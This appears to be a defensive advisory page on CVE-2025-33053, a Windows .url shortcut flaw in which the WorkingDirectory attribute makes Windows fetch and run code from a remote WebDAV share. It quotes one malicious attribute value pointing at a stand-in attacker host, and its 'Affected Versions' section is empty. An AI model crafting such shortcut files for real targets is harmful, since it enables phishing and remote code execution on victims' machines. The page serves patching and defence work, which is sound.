CVE-2025-33053

What is the Windows Internet Shortcut (.url) File Format?

Windows Internet Shortcut files (.url) are configuration files that Windows Explorer uses to represent web browser bookmarks and shortcuts on the desktop or in folders. When a user double-clicks a .url file, Windows opens the URL it contains in the default browser. The .url file format supports several configuration attributes including URL=, WorkingDirectory=, and IconFile=. Threat actors regularly weaponize .url and .lnk files in phishing attacks because they can be crafted to execute code when opened.

Overview

CVE-2025-33053 is an external control of file name or path vulnerability (CWE-73) in Windows Internet Shortcut (.url) file handling. When a user opens a crafted .url file, the WorkingDirectory attribute causes Windows to connect to an attacker-controlled WebDAV server and execute code from that remote location. Only one user action is required — double-clicking the .url file — making it a practical phishing payload. It was disclosed as a zero-day in the June 2025 Patch Tuesday.

Affected Versions

Technical Details

The .url file format's WorkingDirectory attribute specifies the working directory for the shortcut's target. When Windows processes a .url file containing WorkingDirectory=\\attacker.com\share, Windows automatically connects to the specified UNC path via WebDAV (or SMB). If the attacker's WebDAV server hosts a malicious file at a path that Windows then executes as part of resolving the working directory context, code execution occurs.

This vulnerability class is related to the well-documented pattern of .lnk and .url file abuse for phishing. The CWE-73 (External Control of File Name or Path) classification reflects that the application trusts an externally supplied path value without sufficient validation.

Exploitation characteristics:

• The victim must open the .url file (single click in some email clients, double-click in Explorer)
• No authentication required from the attacker
• The .url file can be delivered via email, web download, USB, or network share
• Works across all user privilege levels — no admin rights required on the victim

Discovery

Exploited in the wild before the June 2025 Patch Tuesday. The specific threat actor and reporter were not publicly disclosed.

Exploitation Context

This type of .url file exploitation is a staple of phishing campaigns, particularly from Russian-nexus threat actors who have historically abused .lnk and .url files to bypass Mark of the Web (MotW) protections and deliver malware. The zero-day status indicates the technique was actively used in targeted attacks before the patch.

Remediation

1. Apply the June 2025 cumulative update for your Windows version immediately. The CISA deadline was July 1, 2025.
2. Configure email gateways to strip or quarantine .url file attachments — these files have no legitimate use as email attachments.
3. Block WebDAV outbound connections at the perimeter firewall where possible (TCP ports 80/443 to external WebDAV servers); note that blocking all HTTP/HTTPS is impractical.
4. Enable Attack Surface Reduction (ASR) rules in Microsoft Defender that block untrusted or unsigned processes from running from USB or downloaded files.
5. Train users to treat .url files as executable content equivalent to .exe files — clicking them can run code.